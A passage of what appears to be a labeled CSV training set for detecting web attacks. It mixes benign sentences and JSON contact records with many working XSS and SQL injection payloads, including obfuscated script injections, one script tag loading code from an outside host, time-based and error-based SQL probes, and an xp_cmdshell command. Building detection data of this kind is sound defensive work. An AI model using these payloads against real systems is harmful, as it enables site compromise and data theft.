accident of birth to read the works of genius written in those languages; for these were not written in that Greek or Latin which they knew, but in the select language of literature.",3,normal,25468 `'><script>\x0Ajavascript:alert(519)</script>,1,XSS,6745 "{""id"":null,""firstName"":""Penny"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27062 "1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) )",2,SQLi,18063 <td onpointerenter=alert(1)>XSS</td>,1,XSS,8854 "1"" and ( 1668 = 8054 ) *8054",2,SQLi,20844 Select a fitness class to stay active.,3,normal,24227 "<meter onpaste=""alert(1)"" contenteditable>test</meter>",1,XSS,4793 "ABC<div style=""x:exp\x5Cression(javascript:alert(1)"">DEF",1,XSS,4202 Select your mission.,3,normal,24847 Select merchandise.,3,normal,24560 <marquee onstart=alert(1)>XSS</marquee>,1,XSS,8088 "<style>@keyframes slidein {}</style><noscript style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noscript>",1,XSS,321 "<dd onclick=""alert(1)"">test</dd>",1,XSS,9435 1 and ( 3020 = 3020 ) *6703,2,SQLi,20928 "1"" ) as mwja where 7881 = 7881 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10591 1'|| ( select 'vdeo' where 4355 = 4355,2,SQLi,19766 "1' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 'urxs' = 'urxs",2,SQLi,15413 "1' and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14126 ") and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,19668 "If you are attending a baby shower, it is common to select a card to go with the gift you've chosen or give a card with a heartfelt message in it, perhaps with a gift card as well.",3,normal,26055 <plaintext onpointerout=alert(1)>XSS</plaintext>,1,XSS,5915 <plaintext onpointerenter=alert(1)>XSS</plaintext>,1,XSS,5616 1'|| ( select 'xmoq' from dual where 8047 = 8047 and 7533 = 7533 ) ||',2,SQLi,16211 "<label onmouseleave=""alert(1)"">test</label>",1,XSS,7235 "?skinName=asfunction:getURL,javascript:alert(1)//"",",1,XSS,5495 select ( case when ( 6045 = 2786 ) then 6045 else 1/ ( select 0 ) end ) --,2,SQLi,15784 Select the right pieces and your character will feel real; select the wrong ones and readers won't believe a word.,3,normal,25586 &lt;!--&#91;if gte IE 4&#93;&gt;,1,XSS,9411 "1"" ) as bpmk where 4506 = 4506",2,SQLi,20599 "<style>@keyframes slidein {}</style><caption style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></caption>",1,XSS,332 -1190' or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'yxry' like 'yxry,2,SQLi,10002 <th onpointermove=alert(1)>XSS</th>,1,XSS,9007 "1' ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'zcrh' = 'zcrh",2,SQLi,10194 "<script>alert(document.head.innerHTML.substr(146,20));</script>",1,XSS,3118 "<STYLE>@im\port'\ja\vasc\ript:alert("""")';</STYLE>",1,XSS,5792 "<center draggable=""true"" ondragstart=""alert(1)"">test</center>",1,XSS,3333 "<style>:target {transform: rotate(180deg);}</style><meter id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></meter>",1,XSS,615 "{""id"":null,""firstName"":""Dexter"",""lastName"":""Tang"",""address"":""12 Fishery Port Road"",""city"":""551"",""telephone"":""5729478575""}",3,normal,27409 <button onAfterUpdate=javascript:alert(1)>,1,XSS,7582 "<div style=""position:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"" onclick=""alert(1)"">x</button>?",1,XSS,724 "-3819' ) ) ) union all select 9014,9014,9014,9014,9014,9014--",2,SQLi,17029 "<frameset onmouseenter=""alert(1)"">test</frameset>",1,XSS,5808 <menuitem onpointermove=alert(1)>XSS</menuitem>,1,XSS,6160 "<STYLE type=""text/css"">BODY{background:url(""javascript:javascript:alert(1)"")}</STYLE>",1,XSS,1862 1' rlike sleep ( 5 ),2,SQLi,21856 "1' ) ) as hrra where 9533 = 9533 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11065 "<tt onmouseleave=""alert(1)"">test</tt>",1,XSS,8601 "<code oncopy=""alert(1)"" contenteditable>test</code>",1,XSS,5432 "1%' ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( '%' = '",2,SQLi,10326 "1"" ) ) as nsbu where 6569 = 6569 or sleep ( 5 ) #",2,SQLi,18600 Create a map.,3,normal,22854 Select your see.,3,normal,24986 """))) waitfor delay '0:0:20' /*",2,SQLi,20514 "<marquee onclick=""alert(1)"">test</marquee>",1,XSS,7499 1%' ) ) and 4595 = 4595#,2,SQLi,21229 Select the correct path.,3,normal,24313 1' ) as jwch where 4609 = 4609,2,SQLi,20641 "1 AND ELT(1337=1337,SLEEP(5))# 1337",2,SQLi,20019 <frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus>,1,XSS,2261 <dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus>,1,XSS,3466 select sleep ( 5 ) and 'eskp' like 'eskp,2,SQLi,19482 or''=',2,SQLi,22539 "1' ) ) as xrre where 1172 = 1172 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12137 <sub id=x tabindex=1 onfocus=alert(1)></sub>,1,XSS,6903 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 7 ) ) AND 'i' = 'i",2,SQLi,11586 =+ SLEEP(10) + ',2,SQLi,9929 Select a design.,3,normal,24835 "1 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) -- nqdb",2,SQLi,12553 "<font onmousedown=""alert(1)"">test</font>",1,XSS,7877 "<IMG SRC=`javascript:alert(""RSnake says, ''"")`>",1,XSS,6127 "iif ( 2840 = 3788,1,1/0 )",2,SQLi,21126 "<div draggable=""true"" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head>",1,XSS,1280 A register address select line 91 provides a control line input to the tri-state buffer 57 from the bus control logic 49.,3,normal,26436 Select your favorite song to play.,3,normal,22956 "-2979' ) ) as klou where 7092 = 7092 union all select 7092,7092--",2,SQLi,16682 "1"" ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13888 Select your question.,3,normal,24972 "1' ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19109 1'+ ( select onzd where 8452 = 8452 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) +',2,SQLi,10240 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",2,SQLi,14614 "1' in boolean mode ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,11234 "1'+ ( select blbd where 7451 = 7451 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10908 "1"" ) as cfed where 8220 = 8220 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14556 select ( case when ( 8234 = 2498 ) then 8234 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13595 <mark id=x tabindex=1 onfocusin=alert(1)></mark>,1,XSS,6059 x' AND userid IS NULL; --,2,SQLi,21024 "1' in boolean mode ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #",2,SQLi,12958 "Scarcely any one dreamed that individual subjects could safely be left to believe what they would, and permitted, so long as they did not violate the law of the land, freely to select and practise such religious rites as afforded them help and comfort.",3,normal,25708 "<figure onmousedown=""alert(1)"">test</figure>",1,XSS,7021 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'ckpm' = 'ckpm",2,SQLi,12107 Randomly select a game.,3,normal,24321 "<animate attributeName=""onunload"" to=""alert(89)""/>",1,XSS,5690 "{""id"":null,""firstName"":""Suan Choo"",""lastName"":""Lee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27213 1 ) ) as pjkd where 1105 = 1105 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10208 "<style>@keyframes slidein {}</style><frameset style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></frameset>",1,XSS,320 "%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E",1,XSS,53 <slot onpointerout=alert(1)>XSS</slot>,1,XSS,8503 1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,10880 ";alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"";alert(String.fromCharCode(88,83,83))//\"";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,94 "1"" where 4672 = 4672",2,SQLi,21805 "<nobr onmouseout=""alert(1)"">test</nobr>",1,XSS,8221 =1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,9927 ORDER BY 7--,2,SQLi,22301 "<article oncut=""alert(1)"" contenteditable>test</article>",1,XSS,4331 "-1244 ) as qszw where 2332 = 2332 union all select 2332,2332,2332,2332#",2,SQLi,16048 "-1894' ) union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#",2,SQLi,16079 How to watch it: Booksmart is playing in select theaters.,3,normal,26082 "-9456%"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""%"" = """,2,SQLi,10561 "1%"" or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""%"" = """,2,SQLi,11301 "1"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ""zyeo"" like ""zyeo",2,SQLi,10534 <li id=x tabindex=1 onfocus=alert(1)></li>,1,XSS,7447 -1816%' ) ) ) union all select 2072--,2,SQLi,19860 "1 and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,19856 <--`<img/src=` onerror=alert(1)> --!>,1,XSS,8557 "-4291"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""xyhi"" = ""xyhi",2,SQLi,10244 "-7008' ) ) union all select 9080,9080,9080#",2,SQLi,19228 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--",2,SQLi,13478 "1%' union all select null,null,null#",2,SQLi,19952 "-2916"" ) ) or 4946 = 8232--",2,SQLi,20887 "<div style=""font-family:'foo&#10;;color:red;';"">LOL",1,XSS,5342 "1"" ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""isbh"" like ""isbh",2,SQLi,11683 "-8640 ) or elt ( 7657 = 5020,5020 ) and ( 2346 = 2346",2,SQLi,18065 waitfor delay '0:0:5' and ( ( ( 'ozjl' like 'ozjl,2,SQLi,18606 <w contenteditable id=x onfocus=alert()>,1,XSS,7825 "<map onclick=""alert(1)"">test</map>",1,XSS,9270 <script>+-+-1-+-+alert(1)</script>,1,XSS,9170 "1%"" ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14909 <ruby onpointerenter=alert(1)>XSS</ruby>,1,XSS,7974 "1%' or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and '%' = '",2,SQLi,11294 "select pg_sleep ( 5 ) and ( ""%"" = """,2,SQLi,20021 "1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""regi"" like ""regi",2,SQLi,11010 "1234 "" AND 1 = 0 UNION ALL SELECT ""admin"", ""81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,15471 "<details onpaste=""alert(1)"" contenteditable>test</details>",1,XSS,3871 -8056 ) ) as botl where 9225 = 9225 or ( 1182 = 7641 ) *7641--,2,SQLi,16957 "1"" ) ) as eagr where 3366 = 3366 and elt ( 4249 = 4249,7259 ) --",2,SQLi,16788 Where can I select a wine for the dinner party?,3,normal,23965 I want to select a playlist for my road trip.,3,normal,23699 Can you help me decide where to go for a walk?,3,normal,23841 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#",2,SQLi,16899 <rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus>,1,XSS,2595 "))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19449 top[‘al\145rt’](1),1,XSS,9783 Can you help me decide where to go for a hike?,3,normal,23782 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ""%"" = """,2,SQLi,16347 "AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,16896 Select the best lens for capturing beauty.,3,normal,24176 "<map draggable=""true"" ondragenter=""alert(1)"">test</map>",1,XSS,4528 Select your title.,3,normal,24858 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#",2,SQLi,13520 <wbr onpointerleave=alert(1)>XSS</wbr>,1,XSS,8487 "1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12736 I need to select the right song for the event.,3,normal,23843 "1' where 4880 = 4880 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11208 "<noframes onmouseover=""alert(1)"">test</noframes>",1,XSS,6052 <svg><video onload=alert(1)></video>,1,XSS,8849 "<wbr onmouseleave=""alert(1)"">test</wbr>",1,XSS,8169 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ""jkfk"" = ""jkfk",2,SQLi,13360 <!--><scRipT src=//14.rs>,1,XSS,9706 1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'zwyx' = 'zwyx,2,SQLi,18360 <bgsound onpointerdown=alert(1)>XSS</bgsound>,1,XSS,6679 "1%"" ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13851 "select * from generate_series ( 4975,4975,case when ( 4975 = 9615 ) then 1 else 0 end ) limit 1--",2,SQLi,14322 Select your government.,3,normal,24874 Where's the best place to find unique items?,3,normal,23903 "<article onmouseleave=""alert(1)"">test</article>",1,XSS,6129 [a](javascript:confirm(1),1,XSS,9708 -1796' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'lpuw' like 'lpuw,2,SQLi,10289 "1"" ) ) ) and 4595 = 4595#",2,SQLi,21059 "1' ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 'xjvr' = 'xjvr",2,SQLi,12957 "1"" ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ""rfam"" like ""rfam",2,SQLi,10812 "<meter onmouseout=""alert(1)"">test</meter>",1,XSS,7639 Find data where possible.,3,normal,23248 "<a xmlns:xlink=""http://www.w3.org/1999/xlink"" xlink:href=""javascript:alert(87)""><rect width=""1000"" height=""1000"" fill=""white""/></a>",1,XSS,575 "1"" ) ) rlike sleep ( 5 ) and ( ( ""ahhx"" like ""ahhx",2,SQLi,18454 select ( case when ( 3486 = 6373 ) then 3486 else 3486* ( select 3486 from mysql.db ) end ) #,2,SQLi,14538 Update the weather forecast.,3,normal,22588 "-7345%"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""%"" = """,2,SQLi,10588 "1"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( ""czvm"" like ""czvm",2,SQLi,16172 "1' and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13227 "1%"" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13434 "<footer onmousedown=""alert(1)"">test</footer>",1,XSS,6996 "<figcaption onmouseout=""alert(1)"">test</figcaption>",1,XSS,5398 "1%' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17451 "1' ) ) as lmsl where 3753 = 3753 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16278 "<th onkeydown=""alert(1)"" contenteditable>test</th>",1,XSS,5681 1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 6824 = 6824,2,SQLi,15619 "<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>",1,XSS,70 "Get 30 percent off select fashion items including, shirts, handbags, and more, up to 40 percent off select jewelry, and up to 50 percent off select sneakers and activewear all week long from Amazon's Cyber Week deals.",3,normal,26153 "1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""tuhy"" like ""tuhy",2,SQLi,17447 "<;LINK REL="";stylesheet""; HREF="";javascript:alert(';XSS';);"";>;",1,XSS,3001 "<menu onkeydown=""alert(1)"" contenteditable>test</menu>",1,XSS,4748 "1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and 'vmuj' like 'vmuj",2,SQLi,15561 "1' ) ) ) and elt ( 9041 = 6421,6421 ) and ( ( ( 'ixxg' like 'ixxg",2,SQLi,16660 <button onMessage=javascript:alert(1)>,1,XSS,8535 "1%"" ) ) ) and ( 3502 = 7893 ) *7893 and ( ( ( ""%"" = """,2,SQLi,18105 "1' and elt ( 4249 = 4249,7259 ) and 'nsbj' like 'nsbj",2,SQLi,18106 Where's the database file?,3,normal,23398 "1"" where 5328 = 5328 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15789 "<foreignObject xlink:href=""javascript:alert(88)""/>",1,XSS,5693 "1%' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( '%' = '",2,SQLi,11660 "{""id"":null,""firstName"":""Khairul"",""lastName"":""Ashab"",""address"":""1 Robinson Road 20-01 Aia Tower"",""city"":""5"",""telephone"":""5595385103""}",3,normal,27178 <svg onpointerup=alert(1)>XSS</svg>,1,XSS,9119 "-2071 union all select 4753,4753--",2,SQLi,20140 Select your council.,3,normal,24873 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))",2,SQLi,18654 A proposal to create a select vestry in 1822 was easily defeated.,3,normal,26438 "<form onbeforecut=""alert(1)"" contenteditable>test</form>",1,XSS,4343 "<STYLE>BODY{-moz-binding:url(""http://.rocks/moz.xml#"")}</STYLE>",1,XSS,3019 Let's meet at the café where we first met.,3,normal,23731 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,15309 "<style>:target {color:red;}</style><track id=x style=""transition:color 1s"" ontransitionend=alert(1)></track>",1,XSS,1120 <head onpointerleave=alert(1)>XSS</head>,1,XSS,8017 "1' ) where 4778 = 4778 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,17201 "<base onbeforecopy=""alert(1)"" contenteditable>test</base>",1,XSS,4077 Select a recipe to try cooking.,3,normal,24125 <BODY ONLOAD=alert(‘XSS’)>,1,XSS,9667 "-6642' ) where 3459 = 3459 union all select 3459,3459,3459,3459,3459,3459,3459,3459,3459#",2,SQLi,14750 "1 ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 6578 = 6578",2,SQLi,12984 "-6815 where 7609 = 7609 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11564 %2A%28%7C%28mail%3D%2A%29%29,2,SQLi,20785 "-4830"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""dyut"" = ""dyut",2,SQLi,10331 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--",2,SQLi,12985 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--",2,SQLi,18988 -6144' ) or 9385 = 2474--,2,SQLi,21057 "1'|| ( select 'scqw' where 3337 = 3337 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12466 "1"" ) ) as jgie where 8017 = 8017 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --",2,SQLi,14741 "{""id"":null,""firstName"":""Elaine"",""lastName"":""Wong"",""address"":""Lorong 7 Toa Payoh Block 22A Food Centre 22A Lorong 7 Toa Payoh #01-408"",""city"":""601"",""telephone"":""4331839183""}",3,normal,27222 "<style>:target {color:red;}</style><blockquote id=x style=""transition:color 1s"" ontransitionend=alert(1)></blockquote>",1,XSS,758 "<thead onbeforepaste=""alert(1)"" contenteditable>test</thead>",1,XSS,3497 "1'|| ( select 'hdpi' where 5620 = 5620 and make_set ( 8403 = 8403,8899 ) ) ||'",2,SQLi,15336 <center onpointermove=alert(1)>XSS</center>,1,XSS,7146 "<A HREF=""http://google:ha.ckers.org""></A>",1,XSS,7743 "1' union all select null,null,null,null#",2,SQLi,19466 "1"" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11451 "1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""akha"" like ""akha",2,SQLi,16971 "-1079"" ) where 2865 = 2865 union all select 2865,2865,2865,2865,2865,2865,2865,2865,2865#",2,SQLi,14737 "<style>@keyframes x{}</style><object style=""animation-name:x"" onanimationstart=""alert(1)""></object>",1,XSS,1487 Select your company.,3,normal,24865 "<base onmouseleave=""alert(1)"">test</base>",1,XSS,7655 "1%"" ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""%"" = """,2,SQLi,10975 1'|| ( select 'lzzr' where 2477 = 2477,2,SQLi,19708 ; exec master..xp_cmdshell 'ping 172.10.1.255'--,2,SQLi,18647 "<option onpaste=""alert(1)"" contenteditable>test</option>",1,XSS,4269 "1 ) as nfgb where 2503 = 2503 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --",2,SQLi,10610 "select * from users where id = 1 or ""{%"" or 1 = 1 -- 1",2,SQLi,17944 "<style>:target {transform: rotate(180deg);}</style><pre id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></pre>",1,XSS,677 <shadow id=x tabindex=1 onfocusin=alert(1)></shadow>,1,XSS,5136 <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); 